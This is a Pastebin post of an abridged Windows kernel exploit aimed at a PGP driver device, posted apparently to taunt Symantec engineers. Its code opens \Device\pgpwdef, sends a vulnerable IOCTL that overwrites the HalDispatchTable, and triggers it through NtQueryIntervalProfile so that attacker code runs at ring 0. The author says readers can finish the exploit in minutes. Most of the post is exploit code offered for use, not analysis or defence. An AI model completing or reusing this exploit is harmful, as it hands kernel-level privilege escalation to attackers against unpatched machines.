API tools faq
paste
Advertisement
Guest User

Proof for "security" engineers from Symantec

a guest
Jan 5th, 2013
2,292
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.22 KB | None | 0 0
raw download clone embed print report
  1. Cut from my exploit, if you are not n00b - you will craft exploit in minutes, see this:
  2. http://www.exploit-db.com/author/?a=2978
  3.  
  4. Cut:
  5.  
  6. #define IO_CONTROL_VULN 0x80022058
  7.  
  8. #define TARGET_DEVICE L"\\Device\\pgpwdef"
  9.  
  10. [..]
  11.  
  12. usName.Buffer = TARGET_DEVICE;
  13. usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
  14.  
  15. InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , NULL, NULL);
  16.  
  17.  
  18. // get handle of target devide
  19. ns = f_NtOpenFile(
  20. &hDev,
  21. FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
  22. &ObjAttr,
  23. &StatusBlock,
  24. FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
  25. FILE_SYNCHRONOUS_IO_NONALERT
  26. );
  27.  
  28. [..]
  29.  
  30. BOOL bStatus = DeviceIoControl(
  31. hDev,
  32. IO_CONTROL_VULN,
  33. InBuff, 0x8,
  34. OutBuff, 0x8,
  35. &dwReturnLen, NULL
  36. );
  37.  
  38. dwReturnLen = 0;
  39. bStatus = DeviceIoControl(
  40. hDev,
  41. IO_CONTROL_VULN,
  42. InBuff, sizeof(PVOID),
  43. (PUCHAR)m_HalDispatchTable, 0,
  44. &dwReturnLen, NULL
  45. );
  46.  
  47. [..]
  48.  
  49. f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
  50.  
  51. [..]
  52.  
  53. Your evil code processes with CPL==0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!